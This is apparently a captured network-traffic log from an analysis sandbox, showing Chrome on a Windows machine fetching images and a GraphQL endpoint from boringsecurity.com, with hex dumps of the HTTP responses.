                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC421INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 31 33 61 39 66 2d 47 62 77 31 70 62 57 64 59 56 72 77 45 68 66 44 4d 61 58 7a
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:59 GMTEtag: "13a9f-Gbw1pbWdYVrwEhfDMaXz
                                                                          2023-12-10 16:45:00 UTC765INData Raw: 33 63 38 37 0d 0a ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 e8 03 e8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 ff c4 00 17 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 fc 20 00 a0 00 b0 58 28 00 00 52 00 52 54 2d 80 52 58 0b 0b 28 00 42
                                                                          Data Ascii: 3c87C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222" X(RRT-RX(B
                                                                          2023-12-10 16:45:00 UTC2372INData Raw: 40 05 22 c2 a5 00 50 94 28 25 94 00 00 2c 52 01 65 00 5c 8a b0 28 00 02 0a 51 2f 63 e7 d7 a9 e8 dc fe 73 e8 fd b7 7d 4f c6 f6 fd 6f 33 c1 fb 7e fe 16 18 c1 f6 72 e1 83 ea 7c fa 37 f3 b4 7c fc 7d 2e 87 e7 3e 5f d8 f4 97 f0 5c ff 00 63 c2 3f 26 f7 3c c9 af 99 d3 9c a2 89 61 41 50 58 05 80 00 46 36 2a 91 60 58 52 12 c1 50 54 a2 04 a8 14 49 44 50 00 09 41 07 34 a4 b4 4a 04 a2 c1 40 4a 2c a1 28 4a 00 29 2c 05 85 94 0a 45 84 05 a8 54 a0 85 b0 2f 5f 66 cf 0b d1 fd 5f dd ac fe 7f dd 7c 36 7a 5a f2 a1 f6 7c dc a9 26 a5 8c d1 71 60 ce f0 4b 69 95 86 b3 9d 45 c6 e2 f3 a8 7d bd 3e 28 74 f3 3e ee a7 e5 fe 5f df 79 99 d7 e4 9e 9f c1 2e 17 32 d0 58 00 4b 29 65 86 6d a4 d4 a4 96 05 0c eb 25 94 00 9a 80 80 00 20 25 85 41 6c 09 61 50 73 50 00 00 2c a2 05 4a 50 00 02 81 05
                                                                          Data Ascii: @"P(%,Re\(Q/cs}Oo3~r|7|}.>_\c?&<aAPXF6*`XRPTIDPA4J@J,(J),ET/_f_|6zZ|&q`KiE}>(t>_y.2XK)em% %AlaPsP,JP
                                                                          2023-12-10 16:45:00 UTC538INData Raw: bd 73 3a 73 9d 8e 5d 79 c2 37 4f 47 ed f0 3d ee 59 6b a7 0c ba f3 77 38 76 e5 90 ef 83 5c 6e 8c 6b af ce 76 f0 3d 5f 2f 77 87 5e 57 a5 ce ba f2 3a 71 ba 31 bb c8 e9 8b d8 e3 be 54 3e 8f 9c ed c5 d0 e7 d3 38 2c d6 cc 5c 09 8f a3 e7 87 dd e7 7a 79 be df cf 70 80 b9 fc cf eb 7f 25 2a 69 28 0a 02 14 a4 b0 45 80 02 92 00 85 41 80 52 0a 85 04 b2 95 05 02 c0 00 14 1d 3f 43 e1 fe 87 78 f4 79 5c dc ba e3 4b f9 5e 56 73 e9 77 9e bd 71 98 16 6c 62 c0 bd 78 8b 3b 9c f3 06 e6 a1 9b 9d 12 ef 91 a8 ea 72 81 bf 43 e1 c4 7b dd 3e 4f af 8e 72 df 33 59 76 39 cc d3 79 ef c0 c7 5c 7c 55 f2 fc bb e7 d7 5d 32 eb 5c 99 1a 9d 78 8d f3 ec 73 9a c9 bc dd 9c ee 34 2f 4e 23 59 e8 63 36 1d 39 ea 9c c8 73 f4 bc ff 00 af 17 d4 fa 3c ff 00 bc e7 03 b7 e5 3f 57 f9 c8 f9 52 cd 54 05 02 1a
                                                                          Data Ascii: s:s]y7OG=Ykw8v\nkv=_/w^W:q1T>8,\zyp%*i(EAR?Cxy\K^Vswqlbx;rC{>Or3Yv9y\|U]2\xs4/N#Yc69s<?WRT
                                                                          2023-12-10 16:45:00 UTC4744INData Raw: f4 30 c0 4e ff 00 3c 5e 9f 3f 69 7e cf 73 c1 fd 12 79 f0 97 b7 93 ea 79 51 e4 a5 9a b7 3a 04 1a cd 00 8a 21 0b 14 4b 0a 04 b0 20 c4 b0 50 58 28 2c b0 a9 40 00 20 50 03 b7 ea ff 00 29 fa 6d e3 e8 96 6b 32 4d 67 5f 9e e5 d7 84 d6 f5 9f a3 79 e7 90 3a f3 2c 9b 31 d3 7f 39 4f a4 fa fe cf 3f d1 e5 93 bf 2c a4 9d 4e 7a df 12 e7 a7 63 e5 f8 fe e5 78 78 fd 57 8f bb e6 59 d7 77 96 99 35 ec 78 fd 64 fb 7c b8 5b be bf 35 5b 9f a8 f9 fe 9f 47 af 39 f3 77 eb bc cc 66 52 6f b7 cd 12 bb 57 2c ef 11 af cf fe 97 f3 db bc a4 bd 2a f4 e2 5b 3b 9c 71 46 b3 d3 26 73 61 cf be 3a e5 f7 fa 7f 07 de 7c 8a 97 5e 57 ab e4 47 99 65 9a a0 00 50 40 b0 10 94 2c 05 82 ca 32 0c 40 b2 80 15 46 37 0c e8 16 51 2c 25 43 49 44 d4 3b fe 93 f3 de de f1 f7 4c dd 66 7d 7f 27 7c eb f2 fc fa e3 3a
                                                                          Data Ascii: 0N<^?i~syyQ:!K PX(,@ P)mk2Mg_y:,19O?,NzcxxWYw5xd|[5[G9wfRoW,*[;qF&sa:|^WGeP@,2@F7Q,%CID;Lf}'|:
                                                                          2023-12-10 16:45:00 UTC5930INData Raw: dc 6a b4 5b 41 15 fa 3c 51 3a 57 e9 b4 db 10 f4 b4 8d 71 07 e4 a5 29 64 02 6d 63 e4 18 e4 a0 29 56 7b f9 08 ac 02 88 c0 5f 76 7b 44 56 01 44 70 87 08 8c fd df 37 37 0e b6 d3 98 1e 7c d2 18 64 ae 61 d5 68 c3 da e6 ed ff 00 e6 5f e2 63 8d d2 3f 4d a7 a4 c8 c4 11 98 85 ba 3d 8d c0 1b 94 da c6 e9 93 e4 7c ae 5d aa 40 64 23 c6 6a 87 ca 17 95 e4 f1 9a c5 a0 2d 79 41 1e 32 45 7c d0 4e e8 4b 76 ca da 39 8e 12 e4 d1 1b 1f ab d1 ef 4e 6d 1f d0 98 c3 23 b4 d0 a8 9a dd 3c 72 ea 1e e7 fd 6b 4f 36 e7 9e da 37 2d 56 bd 57 27 85 5f 35 e6 c0 5d e1 b4 89 b5 58 bc 87 50 ef 03 84 4d e0 76 5d 79 bc f5 90 8a eb 01 46 f7 31 d0 ca cd 4b 48 20 c6 dd f2 cd 36 e5 45 41 39 89 da cd 30 90 b9 bb 4f e8 00 6e 30 45 b5 06 b7 4d 15 ef d2 c6 38 0d b5 aa 3b 75 6e 3b 96 af 56 65 2b b5 55 80
                                                                          Data Ascii: j[A<Q:Wq)dmc)V{_v{DVDp77|dah_c?M=|]@d#j-yA2E|NKv9Nm#<rkO67-VW'_5]XPMv]yF1KH 6EA90On0EM8;un;Ve+U
                                                                          2023-12-10 16:45:00 UTC1152INData Raw: 58 0b 8d 55 3c a7 78 b0 17 1a a8 21 ce 6a a6 9e e1 ce 6a a6 9e e1 ce 6a a6 9e e1 e5 7b de e1 82 d5 41 dc 37 43 05 aa a6 c8 f0 0c 11 af c7 38 e3 1b cd f6 9e b7 9b 31 c4 2e 4d 34 98 77 1b 31 83 3d 57 b1 70 37 9c 06 9f a8 70 22 ef 55 7b 1c 2a 28 a2 d8 a2 8a 28 b8 4e 08 1c 00 bd 35 d2 7e 21 19 c2 2a 0b b9 ef 08 44 14 6f 3a 94 54 07 f0 07 3b ce 11 b1 e7 14 5b 5f 3a c6 28 b8 56 f5 90 51 71 a8 b2 ca 28 84 51 0f f0 1f ff c4 00 26 11 00 01 03 04 03 00 03 00 02 03 00 00 00 00 00 00 01 00 02 11 10 20 30 31 12 40 50 21 41 51 32 71 61 80 a0 ff da 00 08 01 02 01 01 3f 01 ff 00 74 b8 95 c5 40 b2 4d 60 2e 2b 8f a3 0b 88 fb ac 64 85 1e 64 28 fd b6 42 e4 17 25 c8 a9 2a 4a 92 b9 2e 4a 45 b1 e5 00 bf ab 39 fe 29 34 82 b8 ae 2b 8a e2 b8 ae 2a 0d 66 d8 f1 c0 b0 bb f2 90 a3 1c
                                                                          Data Ascii: XU<x!jjj{A7C81.M4w1=Wp7p"U{*((N5~!*Do:T;[_:(VQq(Q& 01@P!AQ2qa?t@M`.+dd(B%*J.JE9)4+*f
                                                                          2023-12-10 16:45:00 UTC2INData Raw: 0d 0a
                                                                          Data Ascii:
                                                                          2023-12-10 16:45:00 UTC4096INData Raw: 34 30 30 30 0d 0a 65 57 0a fb 09 bb d3 c5 fc 18 f2 9f 3f 65 65 49 48 22 4f 1a cc 66 5f 16 37 8f 02 4e e3 4a 78 d5 dc 3a cf f1 fb f8 1e 29 94 f8 92 3f 4f 5f 01 8f 5b 72 aa 48 c6 7c 29 47 d9 19 52 3d 34 4a 8f 50 c5 c5 89 e4 45 af 89 fd 86 54 f0 a7 97 36 45 63 5a cd 58 6d 58 ae f7 39 1b 18 cb 8b 3f d4 08 d2 7c 02 2c d8 7a b8 5f 92 fb 1b 29 02 c3 c3 27 57 70 c9 ea ee 62 14 27 5a b1 06 4f 12 c6 65 9b 9d 23 93 35 9e 53 9d 76 ac 5f 35 62 e9 ee 43 36 1f f6 13 5c c7 09 11 88 33 e1 94 f8 fb 10 92 43 d2 c3 27 51 f7 06 45 af d4 a0 c9 ff 00 f0 75 05 7f a7 c5 d7 54 98 31 b1 0f 4f 07 f2 aa cd d1 74 fe c6 39 6e 91 94 e3 10 31 82 2e dd c4 7f b5 23 50 49 57 41 ff 00 80 6a c3 d4 b5 fb 09 88 12 53 d6 62 15 fa 9f 50 5d 70 db ab b8 cd a2 7c 8c a8 84 51 8a b3 64 56 2a c7 66 d5
                                                                          Data Ascii: 4000eW?eeIH"Of_7NJx:)?O_[rH|)GR=4JPET6EcZXmX9?|,z_)'Wpb'ZOe#5Sv_5bC6\3C'QEuT1Ot9n1.#PIWAjSbP]p|QdV*f
                                                                          2023-12-10 16:45:00 UTC10674INData Raw: 8c a9 fa fc 6e 7d 9d fb d7 ea f9 f1 7e bc d3 3e 65 ab 0f 81 96 33 6f dc a7 ab f3 c4 fa ee 48 a3 69 f3 b1 06 8d 85 18 fd 53 a2 b9 cc ba 36 da e6 e0 97 71 6d b5 8d 21 b2 d7 ee 64 16 56 be 22 51 2d 87 10 5b b9 8c 2d 89 8e 0f 1a 9b 52 79 a4 30 5f 6e 9a 99 61 5e 62 8a 8c ea 2c 57 43 98 b1 56 8f 49 11 4d 58 72 7a 4c f8 af 45 4a f3 51 9b c4 70 cd 9e 76 78 e3 c6 bc f1 ed 73 1f cc bf cb 49 51 8a 65 f8 95 8c 88 57 78 18 98 42 3a 71 03 64 43 b9 a3 84 ea 88 a6 2d b5 b6 f9 8f cc 5e 63 ac 6e 18 71 a8 e5 a8 15 75 33 fe c9 cf c4 75 05 d4 35 7b 83 6d 54 15 47 1c cb c1 2e 56 30 d3 08 76 b8 a8 0b 07 70 d9 48 af b0 7c 40 2a 21 d2 ee 00 25 ac a1 99 6f 9f 34 2a db 9f ae 13 67 f0 c4 d0 9e 0f 3c fb 2e e3 bd 4d 3e a7 32 bd 5c fb 4f 8e 7d 8d f8 bf 77 9f c2 af 15 e8 af 17 e7 53 7e
                                                                          Data Ascii: n}~>e3oHiS6qm!dV"Q-[-Ry0_na^b,WCVIMXrzLEJQpvxsIQeWxB:qdC-^cnqu3u5{mTG.V0vpH|@*!%o4*g<.M>2\O}wS~


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          156192.168.2.54989023.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:06 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:45:00 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          157192.168.2.54989175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC689OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC506INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 4d 41 59 43 5f 37 65 36 61 33 35 35 36 32 61 2e 70 6e 67 3f 75 72 6c
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:45:00 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url
                                                                          2023-12-10 16:45:00 UTC217INData Raw: 64 33 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 4d 41 59 43 5f 37 65 36 61 33 35 35 36 32 61 2e 70 6e 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 4d 41 59 43 5f 37 65 36 61 33 35 35 36 32 61 2e 70 6e 67 26 77 3d 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: d3Redirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75
                                                                          2023-12-10 16:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          158192.168.2.54989275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC823OUTGET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC416INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 37 2d 79 6a 7a 4b 46 65 64 74 73 50 42 62 59 50 46 65 63 6f 78 47 54 45 36 77
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:00 GMTEtag: 37-yjzKFedtsPBbYPFecoxGTE6w
                                                                          2023-12-10 16:45:00 UTC770INData Raw: 33 63 38 34 0d 0a ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 e8 03 e8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 07 ff c4 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f1 8d 80 e7 38 72 5c 05 5c b7 9d 5c 81 25 60 64 ce 6d dd 57
                                                                          Data Ascii: 3c84C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"8r\\\%`dmW
                                                                          2023-12-10 16:45:00 UTC2372INData Raw: 20 f3 e6 27 4d 6c e9 d3 db c7 9d ac f9 fb cb f1 cc 26 bb 7c d7 e6 77 cb 6b 98 1d 36 b3 a4 a2 63 d3 6c f1 ed e6 b9 17 9d ed 85 4b a7 33 45 ee e7 b7 19 1f 4e 08 be 6f 46 ce 8a 06 d6 47 34 0c 86 ba 8a a3 dc aa 9f 63 3c da cb 2f 5b 3c e3 28 ed 72 f0 61 1d ae 62 23 ec f0 43 ab d6 63 78 ab dc 90 79 99 5c 47 d0 98 01 9c 6e 0f a5 e7 ba 7c e2 8e fa 3d 41 71 e5 5d 79 95 2e 00 f5 1a 5d 9a ef 32 97 26 bd c1 da d8 36 bc 43 be 83 69 f0 bd 20 33 d7 48 e6 40 27 44 20 00 63 b1 cb 58 3b cf eb b0 ab 96 4e c8 e3 0f 37 0c be d3 a8 28 eb 7e df c5 fa 5a bb e5 74 72 2b ba 41 1d 04 b9 c3 50 61 0a 23 61 9b 35 19 86 4b 5d a1 90 48 e1 87 a7 ac 4e 5b 77 8d 37 d5 08 e3 ce 40 d0 b7 9d 65 3d 74 79 bd 92 94 4b af cb 0c 8d 85 c9 2d 8a 83 5d 1e 73 a3 4e 48 0c 30 a3 60 98 44 53 2e ba 3d 5f
                                                                          Data Ascii: 'Ml&|wk6clK3ENoFG4c</[<(rab#Ccxy\Gn|=Aq]y.]2&6Ci 3H@'D cX;N7(~Ztr+APa#a5K]HN[w7@e=tyK-]sNH0`DS.=_
                                                                          2023-12-10 16:45:00 UTC538INData Raw: 29 fd 05 99 b4 f1 d7 dc c7 09 ae f7 3e 35 e7 19 37 2d 0b 43 db 9b ac 5b 4f cd 47 2a 1f 9b 1e 1b 98 b5 1b 83 b0 25 8a 08 d6 0b 11 ed 7b 0d e3 24 bd 3a 23 68 45 a1 31 79 e7 2b 56 aa 6f 36 ab 65 04 56 c6 57 23 d1 d2 f2 26 6f ac 82 d5 a3 51 d5 1b d1 4a bc 23 72 41 ce 97 37 a2 32 1c 6d f3 ea 2e 5f 63 c9 88 9e 97 9b d4 66 73 5b c7 49 9d d2 79 20 50 bc 7a 55 ce 65 b6 4d 99 9e b7 31 41 9b a3 b5 4b ea c9 04 d6 ae 70 f7 20 21 eb de f0 fd 06 bd 86 3c e5 dc 67 85 e9 39 38 6c de 33 a5 7a ce 84 14 51 9d a8 1d 44 f0 b3 44 d1 72 3d 67 9d 73 5b f6 ff 00 3b c1 8e 54 5d 6f 58 6d 29 3a 00 ef a0 37 29 07 a6 67 1c 5e 6f ac 05 bf 2f 3b 75 a4 72 76 f2 ad 2f 56 3b 82 95 68 0d c4 db 55 a0 3b 70 f9 a7 3e ef 35 dc 7c 9c fb f3 ba 04 0c 68 4d 84 b3 59 e6 33 cf e8 c0 ea b6 a6 b8 53 7c
                                                                          Data Ascii: )>57-C[OG*%{$:#hE1y+Vo6eVW#&oQJ#rA72m._cfs[Iy PzUeM1AKp !<g98l3zQDDr=gs[;T]oXm):7)g^o/;urv/V;hU;p>5|hMY3S|
                                                                          2023-12-10 16:45:00 UTC4744INData Raw: 6a e0 4e 02 29 b0 19 f5 c0 15 51 3a 51 30 a9 77 13 6c 76 83 a9 9c a0 71 3e 81 aa b7 2d 73 de 6e 87 72 ac 8e fe d2 eb 65 75 78 da 55 c2 eb f2 18 8d e6 f4 25 5d 95 5a a8 33 34 83 51 63 22 ec 4f 44 7b 9a 43 0e 96 fc ed 1b 7a 81 f9 d2 4d fa 0b e1 5a ae ab 1c 73 aa e8 81 6d 83 61 cd cb 38 06 46 03 4e da 33 a0 ae 0f 2e 9b 2d 6a 63 6c d6 72 e2 7c e3 30 93 92 e8 f5 34 a3 61 c3 4d 45 f7 35 5a 26 40 75 b9 4a 8a 1d 23 2b 9b 91 70 52 71 f7 d1 cf ea 37 e6 3b dc fd 06 0e f7 17 14 3c b9 f3 e7 ee 0b 5c b9 ea e8 d7 19 a6 c5 0d 72 4c 6d 83 ec 89 0c 7a 3a 33 95 33 d8 b4 59 bf 86 28 6a 18 68 d4 30 60 c3 28 54 4b 6c 56 7d a1 6b 72 c1 2a 7a 92 4b 2f 53 ae e5 15 5c ad 57 40 f3 73 23 41 2b e7 0f 3a 53 49 ba b5 50 c2 ca e6 65 bc 34 75 ae 93 e8 52 e8 38 97 45 5f 3d c4 dd 09 cf ea
                                                                          Data Ascii: jN)Q:Q0wlvq>-snreuxU%]Z34Qc"OD{CzMZsma8FN3.-jclr|04aME5Z&@uJ#+pRq7;<\rLmz:33Y(jh0`(TKlV}kr*zK/S\W@s#A+:SIPe4uR8E_=
